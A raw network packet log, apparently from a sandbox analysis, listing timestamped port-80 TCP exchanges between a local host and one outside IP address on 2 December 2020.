                                            Dec 2, 2020 11:52:50.572312117 CET4973180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.625363111 CET804973145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.625467062 CET4973180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.629810095 CET4973180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.681766987 CET804973145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.681869030 CET4973180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.733228922 CET804973145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.756248951 CET804973145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.756270885 CET804973145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.756335974 CET4973180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.756386995 CET4973180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.809437037 CET804973145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.014552116 CET4973280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.067189932 CET804973245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.067327976 CET4973280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.071178913 CET4973280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.123727083 CET804973245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.123859882 CET4973280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.176671028 CET804973245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.201095104 CET804973245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.201137066 CET804973245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.201231956 CET4973280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.201256037 CET4973280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.254654884 CET804973245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.432761908 CET4973380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.484755993 CET804973345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.484941959 CET4973380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.489197016 CET4973380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.541114092 CET804973345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.541227102 CET4973380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.600330114 CET804973345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.665469885 CET804973345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.665499926 CET804973345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.665663004 CET4973380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.665710926 CET4973380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.717617035 CET804973345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.930563927 CET4973480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.983155966 CET804973445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.986118078 CET4973480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.988950968 CET4973480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.041258097 CET804973445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.041430950 CET4973480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.096945047 CET804973445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.132110119 CET804973445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.132138014 CET804973445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.132287979 CET4973480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.132606030 CET4973480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.184711933 CET804973445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.433507919 CET4973580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.486124039 CET804973545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.488142967 CET4973580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.491063118 CET4973580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.543560982 CET804973545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.544442892 CET4973580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.596992016 CET804973545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.618566990 CET804973545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.618622065 CET804973545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.618865013 CET4973580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.618896008 CET4973580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.672725916 CET804973545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.824446917 CET4973780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.877223015 CET804973745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.877429962 CET4973780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.880419970 CET4973780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.938518047 CET804973745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.938637018 CET4973780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.994662046 CET804973745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.017894030 CET804973745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.017920971 CET804973745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.018054962 CET4973780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.161118984 CET804976745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.161303043 CET4976780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.213058949 CET804976745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.249782085 CET804976745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.249804020 CET804976745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.249907017 CET4976780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.250144005 CET4976780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.301949978 CET804976745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.497983932 CET4976880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.550235987 CET804976845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.550381899 CET4976880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.554063082 CET4976880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.606226921 CET804976845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.606434107 CET4976880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.658672094 CET804976845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.678922892 CET804976845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.678955078 CET804976845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.679061890 CET4976880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.679424047 CET4976880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.732508898 CET804976845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.928714037 CET4976980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.980772972 CET804976945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.980895042 CET4976980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.984148026 CET4976980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.035906076 CET804976945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.035990000 CET4976980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.087723970 CET804976945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.107873917 CET804976945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.107897997 CET804976945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.108000994 CET4976980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.108105898 CET4976980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.159962893 CET804976945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.312536001 CET4977080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.366641998 CET804977045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.366802931 CET4977080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.369520903 CET4977080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.422322035 CET804977045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.422445059 CET4977080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.475163937 CET804977045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.495950937 CET804977045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.497396946 CET804977045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.497454882 CET4977080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.497483969 CET4977080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.549890995 CET804977045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.787199020 CET4977180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.842961073 CET804977145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.843117952 CET4977180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.847165108 CET4977180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.900638103 CET804977145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.900952101 CET4977180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.952508926 CET804977145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.981039047 CET804977145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.981071949 CET804977145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.982620955 CET4977180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.983947992 CET4977180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:08.035505056 CET804977145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.125669003 CET4977280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.178973913 CET804977245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.179095984 CET4977280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.181925058 CET4977280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.234721899 CET804977245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.236537933 CET4977280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.289745092 CET804977245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.313579082 CET804977245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.313606024 CET804977245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.313694000 CET4977280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.313755035 CET4977280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.366545916 CET804977245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.514375925 CET4977380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.566468954 CET804977345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.568372965 CET4977380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.569443941 CET4977380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.633182049 CET804977345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.633315086 CET4977380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.684914112 CET804977345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.708132982 CET804977345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.708165884 CET804977345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.708303928 CET4977380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.708333015 CET4977380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.760040045 CET804977345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.967400074 CET4977480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.019642115 CET804977445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.019809961 CET4977480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.023775101 CET4977480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.075654030 CET804977445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.075879097 CET4977480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.128087997 CET804977445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.152570009 CET804977445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.152600050 CET804977445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.152683973 CET4977480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.152713060 CET4977480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.204530954 CET804977445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.394161940 CET4977580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.446897030 CET804977545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.447031975 CET4977580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.449891090 CET4977580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.502516985 CET804977545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.502696991 CET4977580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.555367947 CET804977545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.577105045 CET804977545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.577143908 CET804977545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.577261925 CET4977580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.577310085 CET4977580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.630254030 CET804977545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.888803005 CET4977680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.945538998 CET804977645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.945630074 CET4977680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.948579073 CET4977680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.003570080 CET804977645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.003648996 CET4977680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.055608988 CET804977645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.076914072 CET804977645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.076962948 CET804977645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.077054977 CET4977680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.080533981 CET4977680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.133100986 CET804977645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.333058119 CET4977880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.385174990 CET804977845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.385279894 CET4977880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.388055086 CET4977880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.440393925 CET804977845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.440466881 CET4977880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.492671013 CET804977845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.513309956 CET804977845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.513329029 CET804977845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.513420105 CET4977880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.513446093 CET4977880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.565835953 CET804977845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.712774992 CET4977980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.787625074 CET804977945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.787734985 CET4977980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.790592909 CET4977980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.842355967 CET804977945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.842472076 CET4977980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.913522005 CET804977945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.934709072 CET804977945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.934740067 CET804977945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.934881926 CET4977980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.934922934 CET4977980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.986815929 CET804977945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.196576118 CET4978180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.249593973 CET804978145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.249918938 CET4978180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.252512932 CET4978180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.304796934 CET804978145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.304941893 CET4978180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.357626915 CET804978145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.381217003 CET804978145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.381246090 CET804978145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.381318092 CET4978180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.381345987 CET4978180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.435230017 CET804978145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.633724928 CET4978380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.687006950 CET804978345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.687151909 CET4978380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.692641020 CET4978380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.745105028 CET804978345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.746243000 CET4978380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.798250914 CET804978345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.819813967 CET804978345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.819833040 CET804978345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.819955111 CET4978380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.820060015 CET4978380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.871886969 CET804978345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.057004929 CET4978780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.109174013 CET804978745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.109498978 CET4978780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.113854885 CET4978780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.165960073 CET804978745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.166322947 CET4978780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.222615957 CET804978745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.244582891 CET804978745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.244607925 CET804978745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.244713068 CET4978780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.244731903 CET4978780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.297645092 CET804978745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.447313070 CET4978980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.500498056 CET804978945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.500704050 CET4978980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.503417969 CET4978980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.555365086 CET804978945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.555636883 CET4978980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.635701895 CET804978945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.657265902 CET804978945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.657318115 CET804978945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.657484055 CET4978980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.657596111 CET4978980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.709608078 CET804978945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.860605955 CET4979180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.913461924 CET804979145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.913629055 CET4979180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.917886019 CET4979180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.981862068 CET804979145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.981981039 CET4979180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.036329985 CET804979145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.077527046 CET804979145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.077553034 CET804979145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.077670097 CET4979180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.077738047 CET4979180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.132010937 CET804979145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.322705030 CET4979380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.374680042 CET804979345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.374922037 CET4979380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.377621889 CET4979380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.432105064 CET804979345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.432190895 CET4979380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.484000921 CET804979345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.504591942 CET804979345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.504621983 CET804979345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.504764080 CET4979380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.504792929 CET4979380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.556704044 CET804979345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.704958916 CET4979580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.756844997 CET804979545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.758234024 CET4979580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.761208057 CET4979580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.813052893 CET804979545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.813211918 CET4979580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.865098000 CET804979545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.888012886 CET804979545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.888097048 CET804979545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.888304949 CET4979580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.888340950 CET4979580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.940632105 CET804979545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.067962885 CET4979780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.121232986 CET804979745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.121407986 CET4979780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.124828100 CET4979780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.177269936 CET804979745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.177397966 CET4979780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.229598045 CET804979745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.253380060 CET804979745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.253452063 CET804979745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.253591061 CET4979780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.253614902 CET4979780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.305684090 CET804979745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.440406084 CET4979980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.492430925 CET804979945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.495469093 CET4979980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.497787952 CET4979980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.550386906 CET804979945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.550455093 CET4979980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.602180958 CET804979945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.625170946 CET804979945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.625202894 CET804979945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.625375986 CET4979980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.625411034 CET4979980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.708633900 CET804979945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.810756922 CET4980080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.862827063 CET804980045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.862957001 CET4980080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.866136074 CET4980080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.918255091 CET804980045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.918363094 CET4980080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.970554113 CET804980045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.992594004 CET804980045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.835345984 CET4984180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.887653112 CET804984145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.887763023 CET4984180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.940536976 CET804984145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.961003065 CET804984145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.961066008 CET804984145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.961190939 CET4984180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.961222887 CET4984180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.013757944 CET804984145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.185509920 CET4984380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.237936974 CET804984345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.238069057 CET4984380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.245196104 CET4984380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.297610044 CET804984345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.297722101 CET4984380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.350331068 CET804984345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.371175051 CET804984345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.371220112 CET804984345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.371309996 CET4984380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.371455908 CET4984380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.428301096 CET804984345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.564183950 CET4984480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.618022919 CET804984445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.618380070 CET4984480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.625790119 CET4984480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.678446054 CET804984445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.678523064 CET4984480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.731322050 CET804984445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.751743078 CET804984445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.751765013 CET804984445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.751837015 CET4984480192.168.2.645.144.3.234
